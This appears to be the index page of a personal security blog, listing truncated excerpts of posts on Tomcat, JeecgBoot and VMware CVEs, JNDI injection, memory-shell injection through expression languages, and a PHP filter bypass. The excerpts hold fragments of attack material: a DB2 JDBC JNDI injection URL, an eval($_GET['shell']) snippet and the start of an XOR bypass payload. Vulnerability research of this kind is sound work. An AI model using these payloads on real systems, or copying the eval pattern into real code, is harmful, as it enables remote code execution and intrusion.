Pho3n1x

Tomcat Remote Command Execution Vulnerability (CVE-2024-50379)

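Preface: At noon I suddenly saw that a vulnerability had been disclosed in Tomcat, and an RCE at that, so I wanted to analyze it right away. It looks very familiar (CVE-2017-12615), but in actual testing there is one difference: we need to bypass the path check. Below is my analysis process. Analysis: Affected versions: 11.0.0-M1 <= Apache Tomcat < 11.0.2 10.1.0-M1 <&#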
2024-12-18
CVE
#CVE #code-audit #Apache

Expression Language Memory Shell Injection (Part 1)

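Preface: Throughout vulnerability research and attack-defense work, we find that expression language injection vulnerabilities come up frequently, and to keep access stable it is unavoidable to inject a memory shell. Expression language overview: The expression languages tested in this article are mostly common Java expression languages or common templates, six in total, as follows: EL, OGNL, SPEL, Thymeleaf, Velocity, FreeMarker. Expression language introduction: EL expressions: The full name of EL expressions is Expression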
2024-03-01
Study Notes
#java

JNDI Injection Hunting

Something here is encrypted; enter the password to view it.
2023-12-29
rce
#code-audit

Java_JDBC(commonscollection3.2.2)Bypass

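0x01 Analyzing the challenge: A quick rundown of the information: visiting the challenge gives a connection test page. The attachment provided with the challenge is as follows: It is easy to see that the point being tested is DB2 JNDI injection. The DB2 JNDI payload looks roughly like this: jdbc:db2://127.0.0.1:50001/db:clientRerouteServerListJNDIName=ldap://127.0.0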
2023-12-29
rce
#CTF #Bypass

LimeSurvey GetShell

Something here is encrypted; enter the password to view it.
2023-12-26
rce
#code-audit

CVE-2023-41544(JeecgBoot FreeMarker SSTI)

Description: The JeecgBoot/jeecg boot/jmreport/loadTableData API interface does not have identity verification. Freemarker is used to process SQL parameters passed in by the user, and arb
2023-09-18
CVE
#CVE #code-audit #JeecgBoot

CVE-2023-41543(JeecgBoot Sql Injection)

Description: JEECG Boot v3.5.3 was discovered to contain a SQL injection in /sys/replicate/check. Affected version: JeecgBoot <= v3.5.3. Vulnerability Analysis: It was found that the fr
2023-09-18
CVE
#CVE #code-audit #JeecgBoot

CVE-2022-22972(VM_access_Identity_authentication_bypass)

Vulnerability Description: VMware is a provider of global desktop to data center virtualization solutions, offering products including our most familiar VMware Workstation, a desktop virtual computing s
2023-09-18
CVE
#CVE #VMware #code-audit

CVE-2023-41542(JeecgBoot Sql Injection)

Description: JEECG Boot v3.5.3 was discovered to contain a SQL injection in /jeecg boot/jmreport/qurestSql. Affected version: JeecgBoot <= v3.5.3. Vulnerability Analysis: It was found t
2023-09-15
CVE
#CVE #code-audit #JeecgBoot

Command Execution Bypass

Command execution bypass without letters or digits: if(!preg_match('/[a-z0-9]/is',$_GET['shell'])){ eval($_GET['shell']);} 1. XOR $_=('%01'^'`'
2022-07-14
rce
#WAF-bypass #rce